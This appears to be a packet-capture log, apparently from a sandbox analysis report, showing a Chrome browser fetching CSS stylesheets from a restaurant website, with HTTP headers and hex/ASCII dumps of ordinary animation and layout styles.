                                                                                                                                                    last-modified: Thu, 15 Aug 2019 21:50:18 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 77749
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:25 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 40 63 68 61 72 73 65 74 20 22 55 54 46 2d 38 22 3b 0a 0a 2f 2a 21 0a 20 2a 20 61 6e 69 6d 61 74 65 2e 63 73 73 20 2d 68 74 74 70 3a 2f 2f 64 61 6e 65 64 65 6e 2e 6d 65 2f 61 6e 69 6d 61 74 65 0a 20 2a 20 56 65 72 73 69 6f 6e 20 2d 20 33 2e 37 2e 30 0a 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 4d 49 54 20 6c 69 63 65 6e 73 65 20 2d 20 68 74 74 70 3a 2f 2f 6f 70 65 6e 73 6f 75 72 63 65 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 73 2f 4d 49 54 0a 20 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 38 20 44 61 6e 69 65 6c 20 45 64 65 6e 0a 20 2a 2f 0a 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 62 6f 75 6e 63 65 20 7b 0a 20 20 66 72 6f 6d 2c 0a 20 20 32 30 25 2c 0a 20 20 35 33 25 2c 0a 20 20 38 30 25 2c 0a 20
                                                                                                                                                    Data Ascii: @charset "UTF-8";/*! * animate.css -http://daneden.me/animate * Version - 3.7.0 * Licensed under the MIT license - http://opensource.org/licenses/MIT * * Copyright (c) 2018 Daniel Eden */@-webkit-keyframes bounce { from, 20%, 53%, 80%,
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2e 30 33 2c 20 31 2e 30 33 2c 20 31 2e 30 33 29 3b 0a 20 20 7d 0a 0a 20 20 38 30 25 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 30 2e 39 37 2c 20 30 2e 39 37 2c 20 30 2e 39 37 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 30 2e 39 37 2c 20 30 2e 39 37 2c 20 30 2e 39 37 29 3b 0a 20 20 7d 0a 0a 20 20 74 6f 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2c 20 31 2c 20 31 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 31 2c 20 31 2c 20 31 29 3b 0a 20 20 7d 0a 7d 0a 0a 2e 62 6f 75
                                                                                                                                                    Data Ascii: ransform: scale3d(1.03, 1.03, 1.03); } 80% { -webkit-transform: scale3d(0.97, 0.97, 0.97); transform: scale3d(0.97, 0.97, 0.97); } to { opacity: 1; -webkit-transform: scale3d(1, 1, 1); transform: scale3d(1, 1, 1); }}.bou
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 0a 2e 66 61 64 65 4f 75 74 44 6f 77 6e 20 7b 0a 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 4f 75 74 44 6f 77 6e 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 2d 6e 61 6d 65 3a 20 66 61 64 65 4f 75 74 44 6f 77 6e 3b 0a 7d 0a 0a 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 66 61 64 65 4f 75 74 44 6f 77 6e 42 69 67 20 7b 0a 20 20 66 72 6f 6d 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 31 3b 0a 20 20 7d 0a 0a 20 20 74 6f 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 32 30 30 30 70 78 2c 20 30 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 33 64 28
                                                                                                                                                    Data Ascii: .fadeOutDown { -webkit-animation-name: fadeOutDown; animation-name: fadeOutDown;}@-webkit-keyframes fadeOutDownBig { from { opacity: 1; } to { opacity: 0; -webkit-transform: translate3d(0, 2000px, 0); transform: translate3d(
                                                                                                                                                    2024-10-01 04:26:25 UTC16336INData Raw: 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 33 64 28 30 2c 20 30 2c 20 31 2c 20 34 35 64 65 67 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 72 6f 74 61 74 65 33 64 28 30 2c 20 30 2c 20 31 2c 20 34 35 64 65 67 29 3b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 74 6f 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 72 69 67 68 74 20 62 6f 74 74 6f 6d 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 72 69 67
                                                                                                                                                    Data Ascii: transform-origin: right bottom; transform-origin: right bottom; -webkit-transform: rotate3d(0, 0, 1, 45deg); transform: rotate3d(0, 0, 1, 45deg); opacity: 0; } to { -webkit-transform-origin: right bottom; transform-origin: rig
                                                                                                                                                    2024-10-01 04:26:25 UTC48INData Raw: 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 31 37 35 2c 20 30 2e 38 38 35 2c 20 30 2e 33 32 2c 20 31 29 3b 0a 20 20 7d 0a 7d 0a 0a 40
                                                                                                                                                    Data Ascii: n: cubic-bezier(0.175, 0.885, 0.32, 1); }}@
                                                                                                                                                    2024-10-01 04:26:25 UTC12213INData Raw: 6b 65 79 66 72 61 6d 65 73 20 7a 6f 6f 6d 49 6e 55 70 20 7b 0a 20 20 66 72 6f 6d 20 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 30 2e 31 2c 20 30 2e 31 2c 20 30 2e 31 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 31 30 30 30 70 78 2c 20 30 29 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 73 63 61 6c 65 33 64 28 30 2e 31 2c 20 30 2e 31 2c 20 30 2e 31 29 20 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 20 31 30 30 30 70 78 2c 20 30 29 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e 3a 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 35 35 2c 20 30 2e 30 35 35 2c 20 30 2e 36 37 35 2c
                                                                                                                                                    Data Ascii: keyframes zoomInUp { from { opacity: 0; -webkit-transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 1000px, 0); transform: scale3d(0.1, 0.1, 0.1) translate3d(0, 1000px, 0); -webkit-animation-timing-function: cubic-bezier(0.55, 0.055, 0.675,


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    3192.168.2.449743162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:25 UTC584OUTGET /assets/css/custom.css HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:25 UTC351INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:25 GMT
                                                                                                                                                    content-type: text/css
                                                                                                                                                    last-modified: Fri, 02 Aug 2024 12:14:55 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 27894
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:25 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 2f 2a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 0d 0a 20 20 20 20 48 6f 6d 65 20 70 61 67 65 20 73 6c 69 64 65 72 73 20 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2a 2f 0d 0a 0d 0a 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 33 20 7b 0d 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 68 65 69 67 68 74 3a 20 61 75 74 6f 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 70 78 3b 0d 0a 20 20 20 20 70 61 64 64
                                                                                                                                                    Data Ascii: /*------------------------------------------------------------------ Home page sliders -------------------------------------------------------------------*/.container-fluid3 { width: 100%;height: auto; padding-right: 0px; padd
                                                                                                                                                    2024-10-01 04:26:25 UTC6016INData Raw: 70 78 29 20 7b 0d 0a 09 23 66 68 35 63 6f 2d 66 65 61 74 75 72 65 64 20 2e 66 68 35 63 6f 2d 67 72 69 64 20 3e 20 2e 66 68 35 63 6f 2d 76 2d 68 61 6c 66 20 2e 66 68 35 63 6f 2d 73 70 65 63 69 61 6c 2d 31 2e 61 72 72 6f 77 2d 6c 65 66 74 3a 62 65 66 6f 72 65 2c 20 23 66 68 35 63 6f 2d 66 65 61 74 75 72 65 64 20 2e 66 68 35 63 6f 2d 67 72 69 64 20 3e 20 2e 66 68 35 63 6f 2d 76 2d 68 61 6c 66 20 2e 66 68 35 63 6f 2d 73 70 65 63 69 61 6c 2d 31 2e 61 72 72 6f 77 2d 6c 65 66 74 3a 3a 62 65 66 6f 72 65 20 7b 0d 0a 09 20 20 62 6f 72 64 65 72 2d 6c 65 66 74 3a 20 31 35 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0d 0a 09 20 20 62 6f 72 64 65 72 2d 72 69 67 68 74 3a 20 31 35 70 78 20 73 6f 6c 69 64 20 74 72 61 6e
                                                                                                                                                    Data Ascii: px) {#fh5co-featured .fh5co-grid > .fh5co-v-half .fh5co-special-1.arrow-left:before, #fh5co-featured .fh5co-grid > .fh5co-v-half .fh5co-special-1.arrow-left::before { border-left: 15px solid transparent !important; border-right: 15px solid tran
                                                                                                                                                    2024-10-01 04:26:25 UTC5494INData Raw: 20 7d 0d 0a 20 20 23 66 68 35 63 6f 2d 6d 65 6e 75 73 20 2e 66 68 35 63 6f 2d 66 6f 6f 64 2d 6d 65 6e 75 20 75 6c 20 6c 69 20 2e 66 68 35 63 6f 2d 66 6f 6f 64 2d 64 65 73 63 20 3e 20 66 69 67 75 72 65 20 7b 0d 0a 09 77 69 64 74 68 3a 20 31 30 25 3b 0d 0a 09 66 6c 6f 61 74 3a 20 6c 65 66 74 3b 0d 0a 09 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0d 0a 09 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 34 25 3b 0d 0a 20 20 7d 0d 0a 20 20 23 66 68 35 63 6f 2d 6d 65 6e 75 73 20 2e 66 68 35 63 6f 2d 66 6f 6f 64 2d 6d 65 6e 75 20 75 6c 20 6c 69 20 2e 66 68 35 63 6f 2d 66 6f 6f 64 2d 64 65 73 63 20 3e 20 66 69 67 75 72 65 20 69 6d 67 20 7b 0d 0a 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 09 2d 77 65 62 6b 69 74 2d 62 6f 72 64 65 72 2d 72 61
                                                                                                                                                    Data Ascii: } #fh5co-menus .fh5co-food-menu ul li .fh5co-food-desc > figure {width: 10%;float: left;position: relative;margin-right: 4%; } #fh5co-menus .fh5co-food-menu ul li .fh5co-food-desc > figure img {max-width: 100%;-webkit-border-ra


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    4192.168.2.449742162.0.209.2394435428C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2024-10-01 04:26:25 UTC585OUTGET /assets/css/foodhut.css HTTP/1.1
                                                                                                                                                    Host: www.afghanhayatrestaurant.com.au
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                    Accept: text/css,*/*;q=0.1
                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                    Sec-Fetch-Dest: style
                                                                                                                                                    Referer: https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                    2024-10-01 04:26:25 UTC352INHTTP/1.1 200 OK
                                                                                                                                                    keep-alive: timeout=5, max=100
                                                                                                                                                    cache-control: public, max-age=604800
                                                                                                                                                    expires: Tue, 08 Oct 2024 04:26:25 GMT
                                                                                                                                                    content-type: text/css
                                                                                                                                                    last-modified: Fri, 06 Oct 2023 14:26:26 GMT
                                                                                                                                                    accept-ranges: bytes
                                                                                                                                                    content-length: 161927
                                                                                                                                                    date: Tue, 01 Oct 2024 04:26:25 GMT
                                                                                                                                                    server: LiteSpeed
                                                                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                                                                    connection: close
                                                                                                                                                    2024-10-01 04:26:25 UTC16032INData Raw: 0a 3a 72 6f 6f 74 20 7b 0a 20 20 2d 2d 62 6c 75 65 3a 20 23 37 39 41 39 46 35 3b 0a 20 20 2d 2d 69 6e 64 69 67 6f 3a 20 23 43 34 35 46 39 30 3b 0a 20 20 2d 2d 70 75 72 70 6c 65 3a 20 23 41 31 36 41 45 38 3b 0a 20 20 2d 2d 70 69 6e 6b 3a 20 23 66 66 32 31 34 66 3b 0a 20 20 2d 2d 72 65 64 3a 20 23 46 38 35 43 37 30 3b 0a 20 20 2d 2d 6f 72 61 6e 67 65 3a 20 23 46 46 38 38 38 32 3b 0a 20 20 2d 2d 79 65 6c 6c 6f 77 3a 20 23 46 41 44 30 32 43 3b 0a 20 20 2d 2d 67 72 65 65 6e 3a 20 23 41 33 43 31 34 41 3b 0a 20 20 2d 2d 74 65 61 6c 3a 20 23 32 30 63 39 39 37 3b 0a 20 20 2d 2d 63 79 61 6e 3a 20 23 34 37 44 38 45 30 3b 0a 20 20 2d 2d 77 68 69 74 65 3a 20 23 66 66 66 3b 0a 20 20 2d 2d 67 72 61 79 3a 20 23 36 63 37 35 37 64 3b 0a 20 20 2d 2d 67 72 61 79 2d 64 61 72
                                                                                                                                                    Data Ascii: :root { --blue: #79A9F5; --indigo: #C45F90; --purple: #A16AE8; --pink: #ff214f; --red: #F85C70; --orange: #FF8882; --yellow: #FAD02C; --green: #A3C14A; --teal: #20c997; --cyan: #47D8E0; --white: #fff; --gray: #6c757d; --gray-dar
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 7d 0a 20 20 2e 6f 72 64 65 72 2d 73 6d 2d 66 69 72 73 74 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 30 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 2d 31 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 2d 31 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 72 64 65 72 3a 20 2d 31 3b 0a 20 20 7d 0a 20 20 2e 6f 72 64 65 72 2d 73 6d 2d 6c 61 73 74 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 64 69 6e 61 6c 2d 67 72 6f 75 70 3a 20 31 34 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6f 72 64 65 72 3a 20 31 33 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 6f 72 64 65 72 3a 20 31 33 3b 0a 20 20
                                                                                                                                                    Data Ascii: idth: 100%; } .order-sm-first { -webkit-box-ordinal-group: 0; -webkit-order: -1; -ms-flex-order: -1; order: -1; } .order-sm-last { -webkit-box-ordinal-group: 14; -webkit-order: 13; -ms-flex-order: 13;
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 3a 20 31 32 3b 0a 20 20 7d 0a 20 20 2e 6f 66 66 73 65 74 2d 78 6c 2d 30 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 7d 0a 20 20 2e 6f 66 66 73 65 74 2d 78 6c 2d 31 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 38 2e 33 33 33 33 33 25 3b 0a 20 20 7d 0a 20 20 2e 6f 66 66 73 65 74 2d 78 6c 2d 32 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 31 36 2e 36 36 36 36 37 25 3b 0a 20 20 7d 0a 20 20 2e 6f 66 66 73 65 74 2d 78 6c 2d 33 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 32 35 25 3b 0a 20 20 7d 0a 20 20 2e 6f 66 66 73 65 74 2d 78 6c 2d 34 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 33 33 2e 33 33 33 33 33 25 3b 0a 20 20 7d 0a 20 20 2e 6f 66 66 73 65 74 2d 78 6c 2d 35 20
                                                                                                                                                    Data Ascii: : 12; } .offset-xl-0 { margin-left: 0; } .offset-xl-1 { margin-left: 8.33333%; } .offset-xl-2 { margin-left: 16.66667%; } .offset-xl-3 { margin-left: 25%; } .offset-xl-4 { margin-left: 33.33333%; } .offset-xl-5
                                                                                                                                                    2024-10-01 04:26:25 UTC15252INData Raw: 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 61 75
                                                                                                                                                    Data Ascii: center; -webkit-align-items: center; -ms-flex-align: center; align-items: center; -webkit-box-pack: center; -webkit-justify-content: center; -ms-flex-pack: center; justify-content: center; width: au
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 0a 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 3e 20 2e 63 6f 6e 74 61 69 6e 65 72 2c 0a 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 3e 20 2e 63 6f 6e 74 61 69 6e 65 72 2d 66 6c 75 69 64 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 30 3b 0a 20 20 7d 0a 7d 0a 0a 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 39 39 32 70 78 29 20 7b 0a 20 20 2e 6e 61 76 62 61 72 2d 65 78 70 61 6e 64 2d 6c 67 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 20 68 6f 72 69 7a 6f 6e 74 61 6c 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 6e 6f 72 6d 61 6c 3b 0a 20 20 20 20 2d 77 65 62
                                                                                                                                                    Data Ascii: .navbar-expand-lg > .container, .navbar-expand-lg > .container-fluid { padding-right: 0; padding-left: 0; }}@media (min-width: 992px) { .navbar-expand-lg { -webkit-box-orient: horizontal; -webkit-box-direction: normal; -web
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 2f 2a 2d 2d 2d 3c 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 3e 2d 2d 2a 2f 0a 2e 62 6f 72 64 65 72 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 34 39 35 30 35 37 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 62 6f 72 64 65 72 2d 74 6f 70 20 7b 0a 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 34 39 35 30 35 37 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2e 62 6f 72 64 65 72 2d 72 69 67 68 74 20 7b 0a 20 20 62 6f 72
                                                                                                                                                    Data Ascii: ground-color: transparent !important;}/*---<********************************************************************>--*/.border { border: 1px solid #495057 !important;}.border-top { border-top: 1px solid #495057 !important;}.border-right { bor
                                                                                                                                                    2024-10-01 04:26:25 UTC16384INData Raw: 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 70 61 63 6b 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 20 20 2e 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 2d 73 6d 2d 62 65 74 77 65 65 6e 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 20 6a 75 73 74 69 66 79 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 6a
                                                                                                                                                    Data Ascii: -pack: center !important; -webkit-justify-content: center !important; -ms-flex-pack: center !important; justify-content: center !important; } .justify-content-sm-between { -webkit-box-pack: justify !important; -webkit-j
                                                                                                                                                    2024-10-01 04:26:25 UTC16336INData Raw: 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 63 65 6e 74 65 72 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 20 20 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 62 61 73 65 6c 69 6e 65 20 7b 0a 20 20 20 20 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 62 61 73 65 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 2d 6d 73 2d 66 6c 65 78 2d 69 74 65 6d 2d 61 6c 69 67 6e 3a 20 62 61 73 65 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 61 6c 69 67 6e 2d 73 65 6c 66 3a 20 62 61 73 65 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20 7d 0a 20 20 2e 61 6c 69 67 6e 2d 73 65 6c 66 2d 6c 67 2d 73 74 72 65 74 63 68 20 7b 0a 20 20 20 20 2d 77 65
                                                                                                                                                    Data Ascii: ; align-self: center !important; } .align-self-lg-baseline { -webkit-align-self: baseline !important; -ms-flex-item-align: baseline !important; align-self: baseline !important; } .align-self-lg-stretch { -we
                                                                                                                                                    2024-10-01 04:26:25 UTC48INData Raw: 74 3b 0a 20 20 7d 0a 20 20 2e 70 2d 73 6d 2d 30 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 20 20
                                                                                                                                                    Data Ascii: t; } .p-sm-0 { padding: 0 !important;
